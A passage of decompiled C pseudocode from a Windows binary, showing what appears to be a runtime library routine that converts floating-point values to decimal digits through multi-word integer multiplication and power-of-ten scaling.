									_t1255 = 0;
									__eflags = 0;
									while(1) {
										_t1030 =  *((intOrPtr*)(_t1344 + _t1255 - 0x570));
										__eflags = _t1030 -  *((intOrPtr*)(_t1344 + _t1255 - 0x1d0));
										if(_t1030 !=  *((intOrPtr*)(_t1344 + _t1255 - 0x1d0))) {
											goto L100;
										}
										_t1255 = _t1255 + 4;
										__eflags = _t1255 - 8;
										if(_t1255 != 8) {
											continue;
										} else {
											__eflags = 0;
											asm("bsr eax, esi");
											_v1908 = 0;
											if(0 == 0) {
												_t1031 = 0;
											} else {
												_t1031 = _t1030 + 1;
											}
											__eflags = _t1272 - _t1031 - 2;
											asm("sbb esi, esi");
											_t1334 =  ~_t1318 + _t1147;
											__eflags = _t1334 - 0x73;
											if(_t1334 <= 0x73) {
												_t1256 = _t1334 - 1;
												__eflags = _t1256 - 0xffffffff;
												if(_t1256 != 0xffffffff) {
													_t1299 = _t1256 - 1;
													while(1) {
														__eflags = _t1256 - _t1147;
														if(_t1256 >= _t1147) {
															_t1037 = 0;
														} else {
															_t1037 =  *(_t1344 + _t1256 * 4 - 0x1d0);
														}
														__eflags = _t1299 - _t1147;
														if(_t1299 >= _t1147) {
															_t1192 = 0;
														} else {
															_t1192 =  *(_t1344 + _t1256 * 4 - 0x1d4);
														}
														 *(_t1344 + _t1256 * 4 - 0x1d0) = _t1192 >> 0x0000001e | _t1037 << 0x00000002;
														_t1256 = _t1256 - 1;
														_t1299 = _t1299 - 1;
														__eflags = _t1256 - 0xffffffff;
														if(_t1256 == 0xffffffff) {
															goto L98;
														}
														_t1147 = _v472;
													}
												}
												L98:
												_v472 = _t1334;
											} else {
												_v1400 = 0;
												_v472 = 0;
												E6DA90928( &_v468, 0x1cc,  &_v1396, 0);
												_t1347 =  &(_t1347[0x10]);
											}
											_t1275 = 0x435 >> 5;
											E6DA8B0A0(0x435 >> 5,  &_v1396, 0, 0x435);
											 *(_t1344 + 0xbad63d) = 1 << (0x00000435 - _v1872 & 0x0000001f);
										}
										goto L117;
									}
								}
								goto L100;
							}
							L117:
							_t843 = _t1275 + 1;
							_t1323 = 0x1cc;
							_v1400 = _t843;
							_v936 = _t843;
							E6DA90928( &_v932, 0x1cc,  &_v1396, _t843 << 2);
							_t1348 =  &(_t1347[0x1c]);
							_t1122 = 1;
							__eflags = 1;
						} else {
							_v1396 = _v1396 & 0x00000000;
							_v1392 = 0x100000;
							_v1400 = 2;
							__eflags = _t1318;
							if(_t1318 == 0) {
								L57:
								_t1195 = _t1229 - 0x432;
								_t1196 = _t1195 & 0x0000001f;
								_v1880 = _t1195 >> 5;
								_v1896 = _t1196;
								_v1924 = _t1272 - _t1196;
								_t1045 = E6DAA1ED0(_t1122, _t1272 - _t1196, 0);
								_t1258 = _v1868;
								_t1046 = _t1045 - 1;
								_t130 =  &_v1908;
								 *_t130 = _v1908 & 0x00000000;
								__eflags =  *_t130;
								_v1876 = _t1046;
								_t1047 =  !_t1046;
								_v1920 = _t1047;
								asm("bsr eax, ecx");
								if( *_t130 == 0) {
									_t138 =  &_v1868;
									 *_t138 = _v1868 & 0x00000000;
									__eflags =  *_t138;
								} else {
									_v1868 = _t1047 + 1;
								}
								_t1199 = _v1880;
								_t1323 = 0x1cc;
								_t1048 = _t1199 + _t1258;
								__eflags = _t1048 - 0x73;
								if(_t1048 <= 0x73) {
									__eflags = _t1272 - _v1868 - _v1896;
									asm("sbb eax, eax");
									_t1051 =  ~_t1048 + _t1199 + _t1258;
									_v1916 = _t1051;
									__eflags = _t1051 - 0x73;
									if(_t1051 > 0x73) {
										goto L61;
									} else {
										_t1301 = _t1199 - 1;
										_t1059 = _t1051 - 1;
										_v1900 = _t1301;
										_v1872 = _t1059;
										__eflags = _t1059 - _t1301;
										if(_t1059 != _t1301) {
											_t1305 = _t1059 - _t1199;
											__eflags = _t1305;
											_t1202 =  &(( &_v472)[_t1305]);
											_v1892 = _t1202;
											while(1) {
												__eflags = _t1305 - _t1258;
												if(_t1305 >= _t1258) {
													_t1063 = 0;
													__eflags = 0;
												} else {
													_t1063 = _t1202[1];
												}
												_v1868 = _t1063;
												_t158 = _t1305 - 1; // -4
												__eflags = _t158 - _t1258;
												if(_t158 >= _t1258) {
													_t1065 = 0;
													__eflags = 0;
												} else {
													_t1065 =  *_t1202;
												}
												_t1205 = _v1872;
												 *(_t1344 + _t1205 * 4 - 0x1d0) = (_t1065 & _v1920) >> _v1924 | (_v1868 & _v1876) << _v1896;
												_t1070 = _t1205 - 1;
												_t1202 = _v1892 - 4;
												_v1872 = _t1070;
												_t1305 = _t1305 - 1;
												_v1892 = _t1202;
												__eflags = _t1070 - _v1900;
												if(_t1070 == _v1900) {
													break;
												}
												_t1258 = _v472;
											}
											_t1199 = _v1880;
										}
										__eflags = _t1199;
										if(_t1199 != 0) {
											__eflags = 0;
											memset( &_v468, 0, _t1199 << 2);
											_t1347 =  &(_t1347[0xc]);
										}
										_v472 = _v1916;
									}
								} else {
									L61:
									_v1400 = 0;
									_v472 = 0;
									E6DA90928( &_v468, _t1323,  &_v1396, 0);
									_t1347 =  &(_t1347[0x10]);
								}
								_v1396 = 2;
								_push(4);
							} else {
								_t1207 = 0;
								__eflags = 0;
								while(1) {
									__eflags =  *((intOrPtr*)(_t1344 + _t1207 - 0x570)) -  *((intOrPtr*)(_t1344 + _t1207 - 0x1d0));
									if( *((intOrPtr*)(_t1344 + _t1207 - 0x570)) !=  *((intOrPtr*)(_t1344 + _t1207 - 0x1d0))) {
										goto L57;
									}
									_t1207 = _t1207 + 4;
									__eflags = _t1207 - 8;
									if(_t1207 != 8) {
										continue;
									} else {
										_t1208 = _t1229 - 0x431;
										_t1209 = _t1208 & 0x0000001f;
										_v1880 = _t1208 >> 5;
										_v1896 = _t1209;
										_v1876 = _t1272 - _t1209;
										_t1076 = E6DAA1ED0(_t1122, _t1272 - _t1209, 0);
										_t1263 = _v1868;
										_t1077 = _t1076 - 1;
										_t70 =  &_v1908;
										 *_t70 = _v1908 & 0x00000000;
										__eflags =  *_t70;
										_v1900 = _t1077;
										_t1078 =  !_t1077;
										_v1924 = _t1078;
										asm("bsr eax, ecx");
										if( *_t70 == 0) {
											_t78 =  &_v1868;
											 *_t78 = _v1868 & 0x00000000;
											__eflags =  *_t78;
										} else {
											_v1868 = _t1078 + 1;
										}
										_t1212 = _v1880;
										_t1323 = 0x1cc;
										_t1079 = _t1212 + _t1263;
										__eflags = _t1079 - 0x73;
										if(_t1079 <= 0x73) {
											__eflags = _t1272 - _v1868 - _v1896;
											asm("sbb eax, eax");
											_t1082 =  ~_t1079 + _t1212 + _t1263;
											_v1920 = _t1082;
											__eflags = _t1082 - 0x73;
											if(_t1082 > 0x73) {
												goto L39;
											} else {
												_t1307 = _t1212 - 1;
												_t1088 = _t1082 - 1;
												_v1916 = _t1307;
												_v1872 = _t1088;
												__eflags = _t1088 - _t1307;
												if(_t1088 != _t1307) {
													_t1311 = _t1088 - _t1212;
													__eflags = _t1311;
													_t1215 =  &(( &_v472)[_t1311]);
													_v1892 = _t1215;
													while(1) {
														__eflags = _t1311 - _t1263;
														if(_t1311 >= _t1263) {
															_t1092 = 0;
															__eflags = 0;
														} else {
															_t1092 = _t1215[1];
														}
														_v1868 = _t1092;
														_t98 = _t1311 - 1; // -4
														__eflags = _t98 - _t1263;
														if(_t98 >= _t1263) {
															_t1094 = 0;
															__eflags = 0;
														} else {
															_t1094 =  *_t1215;
														}
														_t1218 = _v1872;
														 *(_t1344 + _t1218 * 4 - 0x1d0) = (_t1094 & _v1924) >> _v1876 | (_v1868 & _v1900) << _v1896;
														_t1099 = _t1218 - 1;
														_t1215 = _v1892 - 4;
														_v1872 = _t1099;
														_t1311 = _t1311 - 1;
														_v1892 = _t1215;
														__eflags = _t1099 - _v1916;
														if(_t1099 == _v1916) {
															break;
														}
														_t1263 = _v472;
													}
													_t1212 = _v1880;
												}
												__eflags = _t1212;
												if(_t1212 != 0) {
													__eflags = 0;
													memset( &_v468, 0, _t1212 << 2);
													_t1347 =  &(_t1347[0xc]);
												}
												_v472 = _v1920;
											}
										} else {
											L39:
											_v1400 = 0;
											_v472 = 0;
											E6DA90928( &_v468, _t1323,  &_v1396, 0);
											_t1347 =  &(_t1347[0x10]);
										}
										_t1087 = 4;
										_v1396 = _t1087;
										_push(_t1087);
									}
									goto L56;
								}
								goto L57;
							}
							L56:
							_v1392 = _v1392 & 0x00000000;
							_push( &_v1396);
							_v936 = _t1122;
							_push(_t1323);
							_push( &_v932);
							_v1400 = _t1122;
							E6DA90928();
							_t1348 =  &(_t1347[0x10]);
						}
						_t848 = _v1904;
						_t1149 = 0xa;
						_v1924 = _t1149;
						__eflags = _t848;
						if(_t848 < 0) {
							_t849 =  ~_t848;
							_t850 = _t849 / _t1149;
							_v1916 = _t850;
							_t1150 = _t849 % _t1149;
							_v1908 = _t1150;
							__eflags = _t850;
							if(_t850 == 0) {
								L250:
								__eflags = _t1150;
								if(_t1150 != 0) {
									_t896 =  *(0x6daa6f14 + _t1150 * 4);
									_v1908 = _t896;
									__eflags = _t896;
									if(_t896 == 0) {
										L262:
										__eflags = 0;
										_push(0);
										_v472 = 0;
										_v2420 = 0;
										goto L263;
									} else {
										__eflags = _t896 - _t1122;
										if(_t896 != _t1122) {
											_t1165 = _v472;
											__eflags = _t1165;
											if(_t1165 != 0) {
												_v1876 = _v1876 & 0x00000000;
												_t1282 = 0;
												__eflags = 0;
												do {
													_t1244 = _t896 *  *(_t1344 + _t1282 * 4 - 0x1d0) >> 0x20;
													 *(_t1344 + _t1282 * 4 - 0x1d0) = _t896 *  *(_t1344 + _t1282 * 4 - 0x1d0) + _v1876;
													_t896 = _v1908;
													asm("adc edx, 0x0");
													_t1282 = _t1282 + 1;
													_v1876 = _t1244;
													__eflags = _t1282 - _t1165;
												} while (_t1282 != _t1165);
												__eflags = _t1244;
												if(_t1244 != 0) {
													_t903 = _v472;
													__eflags = _t903 - 0x73;
													if(_t903 >= 0x73) {
														goto L262;
													} else {
														 *(_t1344 + _t903 * 4 - 0x1d0) = _t1244;
														_v472 = _v472 + 1;
													}
												}
											}
										}
									}
								}
							} else {
								do {
									__eflags = _t850 - 0x26;
									if(_t850 > 0x26) {
										_t850 = 0x26;
									}
									_t1166 =  *(0x6daa6e7e + _t850 * 4) & 0x000000ff;
									_v1880 = _t850;
									_v1400 = ( *(0x6daa6e7f + _t850 * 4) & 0x000000ff) + ( *(0x6daa6e7e + _t850 * 4) & 0x000000ff);
									E6DA8B0A0(_t1166 << 2,  &_v1396, 0, _t1166 << 2);
									_t914 = E6DA8AB10( &(( &_v1396)[_t1166]), 0x6daa6578 + ( *(0x6daa6e7c + _v1880 * 4) & 0x0000ffff) * 4, ( *(0x6daa6e7f + _t850 * 4) & 0x000000ff) << 2);
									_t1245 = _v1400;
									_t1348 =  &(_t1348[0x18]);
									_v1872 = _t1245;
									__eflags = _t1245 - _t1122;
									if(_t1245 > _t1122) {
										__eflags = _v472 - _t1122;
										if(_v472 > _t1122) {
											__eflags = _t1245 - _v472;
											_t1326 =  &_v1396;
											_t547 = _t1245 - _v472 > 0;
											__eflags = _t547;
											_t915 = _t914 & 0xffffff00 | _t547;
											if(_t547 >= 0) {
												_t1326 =  &_v468;
											}
											_v1892 = _t1326;
											__eflags = _t915;
											if(_t915 == 0) {
												_v1896 = _t1245;
												_t1245 = _v472;
												_v1872 = _t1245;
												_v1876 =  &_v1396;
											} else {
												_v1896 = _v472;
												_v1876 =  &_v468;
											}
											_t917 = 0;
											_t1285 = 0;
											_v1864 = 0;
											__eflags = _t1245;
											if(_t1245 == 0) {
												L244:
												_v472 = _t917;
												_t1323 = 0x1cc;
												_t918 = _t917 << 2;
												__eflags = _t918;
												_push(_t918);
												_t919 =  &_v1860;
												goto L245;
											} else {
												do {
													__eflags =  *(_t1326 + _t1285 * 4);
													if( *(_t1326 + _t1285 * 4) != 0) {
														_t1167 = 0;
														_t1327 = _t1285;
														_v1868 = 0;
														_v1900 = 0;
														__eflags = _v1896;
														if(_v1896 != 0) {
															_t1246 = 0;
															while(1) {
																__eflags = _t1327 - 0x73;
																if(_t1327 == 0x73) {
																	break;
																}
																__eflags = _t1327 - _t917;
																if(_t1327 == _t917) {
																	 *(_t1344 + _t1327 * 4 - 0x740) =  *(_t1344 + _t1327 * 4 - 0x740) & 0x00000000;
																	_t579 = _t1285 + 1; // 0x1
																	_t934 = _t579 + _t1167;
																	__eflags = _t934;
																	_v1864 = _t934;
																}
																_t930 =  *(_v1876 + _t1167 * 4);
																_t1170 = _v1892;
																_t1246 = _t930 *  *(_t1170 + _t1285 * 4) >> 0x20;
																asm("adc edx, 0x0");
																 *(_t1344 + _t1327 * 4 - 0x740) =  *(_t1344 + _t1327 * 4 - 0x740) + _t930 *  *(_t1170 + _t1285 * 4) + _v1868;
																_t917 = _v1864;
																asm("adc edx, 0x0");
																_t1167 = _v1900 + 1;
																_t1327 = _t1327 + 1;
																_v1868 = _t1246;
																_v1900 = _t1167;
																__eflags = _t1167 - _v1896;
																if(_t1167 != _v1896) {
																	continue;
																}
																break;
															}
															__eflags = _t1246;
															if(_t1246 != 0) {
																_t1169 =  &_v1860 + _t1327 * 4;
																_v1868 = _t1169;
																while(1) {
																	__eflags = _t1327 - 0x73;
																	if(_t1327 == 0x73) {
																		goto L240;
																	}
																	__eflags = _t1327 - _t917;
																	if(_t1327 == _t917) {
																		 *_t1169 =  *_t1169 & 0x00000000;
																		__eflags =  *_t1169;
																		_t609 = _t1327 + 1; // 0x1
																		_v1864 = _t609;
																	}
																	_v1868 = _v1868 + 4;
																	_t928 = _t1246;
																	_t1327 = _t1327 + 1;
																	_t1246 = 0;
																	 *_t1169 =  *_t1169 + _t928;
																	__eflags =  *_t1169;
																	_t917 = _v1864;
																	asm("adc edx, edx");
																	if( *_t1169 != 0) {
																		_t1169 = _v1868;
																		continue;
																	}
																	goto L240;
																}
															}
															L240:
															_t1245 = _v1872;
														}
														__eflags = _t1327 - 0x73;
														if(_t1327 == 0x73) {
															_t1323 = 0x1cc;
															goto L260;
														} else {
															_t1326 = _v1892;
															goto L243;
														}
													} else {
														__eflags = _t1285 - _t917;
														if(_t1285 == _t917) {
															 *(_t1344 + _t1285 * 4 - 0x740) =  *(_t1344 + _t1285 * 4 - 0x740) & 0x00000000;
															_t568 = _t1285 + 1; // 0x1
															_t917 = _t568;
															_v1864 = _t917;
														}
														goto L243;
													}
													goto L247;
													L243:
													_t1285 = _t1285 + 1;
													__eflags = _t1285 - _t1245;
												} while (_t1285 != _t1245);
												goto L244;
											}
										} else {
											_t1286 = _v468;
											_t1323 = 0x1cc;
											_v1936 = _t1286;
											_v472 = _t1245;
											E6DA90928( &_v468, 0x1cc,  &_v1396, _t1245 << 2);
											_t1348 =  &(_t1348[0x10]);
											__eflags = _t1286;
											if(_t1286 != 0) {
												__eflags = _t1286 - _t1122;
												if(_t1286 == _t1122) {
													goto L246;
												} else {
													__eflags = _v472;
													if(_v472 == 0) {
														goto L246;
													} else {
														_t1174 = 0;
														_v1920 = _v472;
														_t1287 = 0;
														__eflags = 0;
														do {
															_t942 = _v1936;
															_t1247 = _t942 *  *(_t1344 + _t1287 * 4 - 0x1d0) >> 0x20;
															 *(_t1344 + _t1287 * 4 - 0x1d0) = _t942 *  *(_t1344 + _t1287 * 4 - 0x1d0) + _t1174;
															asm("adc edx, 0x0");
															_t1287 = _t1287 + 1;
															_t1174 = _t1247;
															__eflags = _t1287 - _v1920;
														} while (_t1287 != _v1920);
														__eflags = _t1174;
														if(_t1174 == 0) {
															goto L246;
														} else {
															_t945 = _v472;
															__eflags = _t945 - 0x73;
															if(_t945 >= 0x73) {
																L260:
																_v2420 = 0;
																_v472 = 0;
																E6DA90928( &_v468, _t1323,  &_v2416, 0);
																_t1348 =  &(_t1348[0x10]);
																_t922 = 0;
															} else {
																 *(_t1344 + _t945 * 4 - 0x1d0) = _t1174;
																_v472 = _v472 + 1;
																goto L246;
															}
														}
													}
												}
											} else {
												_v2420 = 0;
												_v472 = 0;
												_push(0);
												_t919 =  &_v2416;
												L245:
												_push(_t919);
												_push(_t1323);
												_push( &_v468);
												E6DA90928();
												_t1348 =  &(_t1348[0x10]);
												L246:
												_t922 = _t1122;
											}
										}
									} else {
										_t1288 = _v1396;
										__eflags = _t1288;
										if(_t1288 != 0) {
											__eflags = _t1288 - _t1122;
											if(_t1288 == _t1122) {
												goto L198;
											} else {
												__eflags = _v472;
												if(_v472 == 0) {
													goto L198;
												} else {
													_t1175 = 0;
													_v1936 = _v472;
													_t1328 = 0;
													__eflags = 0;
													do {
														_t948 = _t1288;
														_t1248 = _t948 *  *(_t1344 + _t1328 * 4 - 0x1d0) >> 0x20;
														 *(_t1344 + _t1328 * 4 - 0x1d0) = _t948 *  *(_t1344 + _t1328 * 4 - 0x1d0) + _t1175;
														asm("adc edx, 0x0");
														_t1328 = _t1328 + 1;
														_t1175 = _t1248;
														__eflags = _t1328 - _v1936;
													} while (_t1328 != _v1936);
													__eflags = _t1175;
													if(_t1175 == 0) {
														goto L198;
													} else {
														_t951 = _v472;
														__eflags = _t951 - 0x73;
														if(_t951 >= 0x73) {
															_v2420 = 0;
															_v472 = 0;
															E6DA90928( &_v468, 0x1cc,  &_v2416, 0);
															_t1348 =  &(_t1348[0x10]);
															_t922 = 0;
															goto L199;
														} else {
															 *(_t1344 + _t951 * 4 - 0x1d0) = _t1175;
															_v472 = _v472 + 1;
															goto L198;
														}
													}
												}
											}
											goto L265;
										} else {
											__eflags = 0;
											_v2420 = 0;
											_v472 = 0;
											E6DA90928( &_v468, 0x1cc,  &_v2416, 0);
											_t1348 =  &(_t1348[0x10]);
											L198:
											_t922 = _t1122;
										}
										L199:
										_t1323 = 0x1cc;
									}
									L247:
									__eflags = _t922;
									if(_t922 == 0) {
										_v2420 = _v2420 & 0x00000000;
										_v472 = _v472 & 0x00000000;
										_push(0);
										L263:
										_push( &_v2416);
										_t899 =  &_v468;
										goto L264;
									} else {
										goto L248;
									}
									goto L265;
									L248:
									_t850 = _v1916 - _v1880;
									__eflags = _t850;
									_v1916 = _t850;
								} while (_t850 != 0);
								_t1150 = _v1908;
								goto L250;
							}
						} else {
							_t960 = _t848 / _t1149;
							_v1876 = _t960;
							_t1176 = _t848 % _t1149;
							_v1936 = _t1176;
							__eflags = _t960;
							if(_t960 == 0) {
								L178:
								__eflags = _t1176;
								if(_t1176 != 0) {
									_t961 =  *(0x6daa6f14 + _t1176 * 4);
									_v1936 = _t961;
									__eflags = _t961;
									if(_t961 != 0) {
										__eflags = _t961 - _t1122;
										if(_t961 != _t1122) {
											_t1177 = _v936;
											__eflags = _t1177;
											if(_t1177 != 0) {
												_v1876 = _v1876 & 0x00000000;
												_t1289 = 0;
												__eflags = 0;
												do {
													_t1250 = _t961 *  *(_t1344 + _t1289 * 4 - 0x3a0) >> 0x20;
													 *(_t1344 + _t1289 * 4 - 0x3a0) = _t961 *  *(_t1344 + _t1289 * 4 - 0x3a0) + _v1876;
													_t961 = _v1936;
													asm("adc edx, 0x0");
													_t1289 = _t1289 + 1;
													_v1876 = _t1250;
													__eflags = _t1289 - _t1177;
												} while (_t1289 != _t1177);
												__eflags = _t1250;
												if(_t1250 != 0) {
													_t964 = _v936;
													__eflags = _t964 - 0x73;
													if(_t964 >= 0x73) {
														goto L180;
													} else {
														 *(_t1344 + _t964 * 4 - 0x3a0) = _t1250;
														_v936 = _v936 + 1;
													}
												}
											}
										}
									} else {
										L180:
										_v2420 = 0;
										_v936 = 0;
										_push(0);
										goto L184;
									}
								}
							} else {
								do {
									__eflags = _t960 - 0x26;
									if(_t960 > 0x26) {
										_t960 = 0x26;
									}
									_t1178 =  *(0x6daa6e7e + _t960 * 4) & 0x000000ff;
									_v1868 = _t960;
									_v1400 = ( *(0x6daa6e7f + _t960 * 4) & 0x000000ff) + ( *(0x6daa6e7e + _t960 * 4) & 0x000000ff);
									E6DA8B0A0(_t1178 << 2,  &_v1396, 0, _t1178 << 2);
									_t977 = E6DA8AB10( &(( &_v1396)[_t1178]), 0x6daa6578 + ( *(0x6daa6e7c + _v1868 * 4) & 0x0000ffff) * 4, ( *(0x6daa6e7f + _t960 * 4) & 0x000000ff) << 2);
									_t1251 = _v1400;
									_t1348 =  &(_t1348[0x18]);
									_v1872 = _t1251;
									__eflags = _t1251 - _t1122;
									if(_t1251 > _t1122) {
										__eflags = _v936 - _t1122;
										if(_v936 > _t1122) {
											__eflags = _t1251 - _v936;
											_t1330 =  &_v1396;
											_t340 = _t1251 - _v936 > 0;
											__eflags = _t340;
											_t978 = _t977 & 0xffffff00 | _t340;
											if(_t340 >= 0) {
												_t1330 =  &_v932;
											}
											_v1896 = _t1330;
											__eflags = _t978;
											if(_t978 == 0) {
												_v1892 = _t1251;
												_t1251 = _v936;
												_v1872 = _t1251;
												_v1916 =  &_v1396;
											} else {
												_v1892 = _v936;
												_v1916 =  &_v932;
											}
											_t980 = 0;
											_t1292 = 0;
											_v1864 = 0;
											__eflags = _t1251;
											if(_t1251 == 0) {
												L172:
												_v936 = _t980;
												_t1323 = 0x1cc;
												_t981 = _t980 << 2;
												__eflags = _t981;
												_push(_t981);
												_t982 =  &_v1860;
												goto L173;
											} else {
												do {
													__eflags =  *(_t1330 + _t1292 * 4);
													if( *(_t1330 + _t1292 * 4) != 0) {
														_t1179 = 0;
														_t1331 = _t1292;
														_v1880 = 0;
														_v1900 = 0;
														__eflags = _v1892;
														if(_v1892 != 0) {
															_t1252 = 0;
															while(1) {
																__eflags = _t1331 - 0x73;
																if(_t1331 == 0x73) {
																	break;
																}
																__eflags = _t1331 - _t980;
																if(_t1331 == _t980) {
																	 *(_t1344 + _t1331 * 4 - 0x740) =  *(_t1344 + _t1331 * 4 - 0x740) & 0x00000000;
																	_t372 = _t1292 + 1; // 0x1
																	_t998 = _t372 + _t1179;
																	__eflags = _t998;
																	_v1864 = _t998;
																}
																_t993 =  *(_v1916 + _t1179 * 4);
																_t1182 = _v1896;
																_t1252 = _t993 *  *(_t1182 + _t1292 * 4) >> 0x20;
																asm("adc edx, 0x0");
																 *(_t1344 + _t1331 * 4 - 0x740) = _t993 *  *(_t1182 + _t1292 * 4) +  *(_t1344 + _t1331 * 4 - 0x740) + _v1880;
																_t980 = _v1864;
																asm("adc edx, 0x0");
																_t1179 = _v1900 + 1;
																_v1880 = _t1252;
																_t1331 = _t1331 + 1;
																_v1900 = _t1179;
																__eflags = _t1179 - _v1892;
																if(_t1179 != _v1892) {
																	continue;
																}
																break;
															}
															__eflags = _t1252;
															if(_t1252 != 0) {
																_t1181 =  &_v1860 + _t1331 * 4;
																_v1880 = _t1181;
																while(1) {
																	__eflags = _t1331 - 0x73;
																	if(_t1331 == 0x73) {
																		goto L168;
																	}
																	__eflags = _t1331 - _t980;
																	if(_t1331 == _t980) {
																		 *_t1181 =  *_t1181 & 0x00000000;
																		__eflags =  *_t1181;
																		_t402 = _t1331 + 1; // 0x1
																		_v1864 = _t402;
																	}
																	_v1880 = _v1880 + 4;
																	_t991 = _t1252;
																	_t1331 = _t1331 + 1;
																	_t1252 = 0;
																	 *_t1181 =  *_t1181 + _t991;
																	__eflags =  *_t1181;
																	_t980 = _v1864;
																	asm("adc edx, edx");
																	if( *_t1181 != 0) {
																		_t1181 = _v1880;
																		continue;
																	}
																	goto L168;
																}
															}
															L168:
															_t1251 = _v1872;
														}
														__eflags = _t1331 - 0x73;
														if(_t1331 == 0x73) {
															__eflags = 0;
															_t1323 = 0x1cc;
															_v2420 = 0;
															_v936 = 0;
															_push(0);
															_t988 =  &_v2416;
															goto L182;
														} else {
															_t1330 = _v1896;
															goto L171;
														}
													} else {
														__eflags = _t1292 - _t980;
														if(_t1292 == _t980) {
															 *(_t1344 + _t1292 * 4 - 0x740) =  *(_t1344 + _t1292 * 4 - 0x740) & 0x00000000;
															_t361 = _t1292 + 1; // 0x1
															_t980 = _t361;
															_v1864 = _t980;
														}
														goto L171;
													}
													goto L175;
													L171:
													_t1292 = _t1292 + 1;
													__eflags = _t1292 - _t1251;
												} while (_t1292 != _t1251);
												goto L172;
											}
										} else {
											_t1293 = _v932;
											_t1323 = 0x1cc;
											_v1920 = _t1293;
											_v936 = _t1251;
											E6DA90928( &_v932, 0x1cc,  &_v1396, _t1251 << 2);
											_t1348 =  &(_t1348[0x10]);
											__eflags = _t1293;
											if(_t1293 != 0) {
												__eflags = _t1293 - _t1122;
												if(_t1293 == _t1122) {
													goto L174;
												} else {
													__eflags = _v936;
													if(_v936 == 0) {
														goto L174;
													} else {
														_t1186 = 0;
														_v1900 = _v936;
														_t1294 = 0;
														__eflags = 0;
														do {
															_t1006 = _v1920;
															_t1253 = _t1006 *  *(_t1344 + _t1294 * 4 - 0x3a0) >> 0x20;
															 *(_t1344 + _t1294 * 4 - 0x3a0) = _t1006 *  *(_t1344 + _t1294 * 4 - 0x3a0) + _t1186;
															asm("adc edx, 0x0");
															_t1294 = _t1294 + 1;
															_t1186 = _t1253;
															__eflags = _t1294 - _v1900;
														} while (_t1294 != _v1900);
														__eflags = _t1186;
														if(_t1186 == 0) {
															goto L174;
														} else {
															_t1009 = _v936;
															__eflags = _t1009 - 0x73;
															if(_t1009 >= 0x73) {
																_v1400 = 0;
																_v936 = 0;
																_push(0);
																_t988 =  &_v1396;
																L182:
																_push(_t988);
																_push(_t1323);
																_push( &_v932);
																E6DA90928();
																_t1348 =  &(_t1348[0x10]);
																_t985 = 0;
															} else {
																 *(_t1344 + _t1009 * 4 - 0x3a0) = _t1186;
																_v936 = _v936 + 1;
																goto L174;
															}
														}
													}
												}
											} else {
												_v1400 = 0;
												_v936 = 0;
												_push(0);
												_t982 =  &_v1396;
												L173:
												_push(_t982);
												_push(_t1323);
												_push( &_v932);
												E6DA90928();
												_t1348 =  &(_t1348[0x10]);
												L174:
												_t985 = _t1122;
											}
										}
									} else {
										_t1295 = _v1396;
										__eflags = _t1295;
										if(_t1295 != 0) {
											__eflags = _t1295 - _t1122;
											if(_t1295 == _t1122) {
												goto L125;
											} else {
												__eflags = _v936;
												if(_v936 == 0) {
													goto L125;
												} else {
													_t1187 = 0;
													_v1920 = _v936;
													_t1332 = 0;
													__eflags = 0;
													do {
														_t1013 = _t1295;
														_t1254 = _t1013 *  *(_t1344 + _t1332 * 4 - 0x3a0) >> 0x20;
														 *(_t1344 + _t1332 * 4 - 0x3a0) = _t1013 *  *(_t1344 + _t1332 * 4 - 0x3a0) + _t1187;
														asm("adc edx, 0x0");
														_t1332 = _t1332 + 1;
														_t1187 = _t1254;
														__eflags = _t1332 - _v1920;
													} while (_t1332 != _v1920);
													__eflags = _t1187;
													if(_t1187 == 0) {
														goto L125;
													} else {
														_t1016 = _v936;
														__eflags = _t1016 - 0x73;
														if(_t1016 >= 0x73) {
															_v1400 = 0;
															_v936 = 0;
															E6DA90928( &_v932, 0x1cc,  &_v1396, 0);
															_t1348 =  &(_t1348[0x10]);
															_t985 = 0;
															goto L126;
														} else {
															 *(_t1344 + _t1016 * 4 - 0x3a0) = _t1187;
															_v936 = _v936 + 1;
															goto L125;
														}
													}
												}
											}
											goto L265;
										} else {
											__eflags = 0;
											_v1864 = 0;
											_v936 = 0;
											E6DA90928( &_v932, 0x1cc,  &_v1860, 0);
											_t1348 =  &(_t1348[0x10]);
											L125:
											_t985 = _t1122;
										}
										L126:
										_t1323 = 0x1cc;
									}
									L175:
									__eflags = _t985;
									if(_t985 == 0) {
										_v2420 = _v2420 & 0x00000000;
										_t428 =  &_v936;
										 *_t428 = _v936 & 0x00000000;
										__eflags =  *_t428;
										_push(0);
										L184:
										_push( &_v2416);
										_t899 =  &_v932;
										L264:
										_push(_t1323);
										_push(_t899);
										E6DA90928();
										_t1348 =  &(_t1348[0x10]);
									} else {
										goto L176;
									}
									goto L265;
									L176:
									_t960 = _v1876 - _v1868;
									__eflags = _t960;
									_v1876 = _t960;
								} while (_t960 != 0);
								_t1176 = _v1936;
								goto L178;
							}
						}
						L265:
						_t1151 = _v472;
						_t1276 = _v1888;
						_v1872 = _t1276;
						__eflags = _t1151;
						if(_t1151 != 0) {
							_v1876 = _v1876 & 0x00000000;
							_t1281 = 0;
							__eflags = 0;
							do {
								_t888 =  *(_t1344 + _t1281 * 4 - 0x1d0);
								_t1242 = 0xa;
								_t1243 = _t888 * _t1242 >> 0x20;
								 *(_t1344 + _t1281 * 4 - 0x1d0) = _t888 * _t1242 + _v1876;
								asm("adc edx, 0x0");
								_t1281 = _t1281 + 1;
								_v1876 = _t1243;
								__eflags = _t1281 - _t1151;
							} while (_t1281 != _t1151);
							_t1276 = _v1872;
							__eflags = _t1243;
							if(_t1243 != 0) {
								_t891 = _v472;
								__eflags = _t891 - 0x73;
								if(_t891 >= 0x73) {
									__eflags = 0;
									_v2420 = 0;
									_v472 = 0;
									E6DA90928( &_v468, _t1323,  &_v2416, 0);
									_t1348 =  &(_t1348[0x10]);
								} else {
									 *(_t1344 + _t891 * 4 - 0x1d0) = _t1243;
									_v472 = _v472 + 1;
								}
							}
						}
						_t853 = E6DA904A0( &_v472,  &_v936);
						_t1154 = _v1888;
						_t1233 = 0xa;
						__eflags = _t853 - _t1233;
						if(_t853 != _t1233) {
							__eflags = _t853;
							if(_t853 != 0) {
								_t1276 = _t1154 + 1;
								 *_t1154 = _t853 + 0x30;
								_v1872 = _t1276;
								goto L280;
							} else {
								_t855 = _v1904 - 1;
								goto L281;
							}
							goto L312;
						} else {
							_t879 = _v936;
							_t1276 = _t1154 + 1;
							_v1904 = _v1904 + 1;
							 *_t1154 = 0x31;
							_v1872 = _t1276;
							_v1908 = _t879;
							__eflags = _t879;
							if(_t879 != 0) {
								_t1280 = 0;
								_t1163 = 0;
								__eflags = 0;
								do {
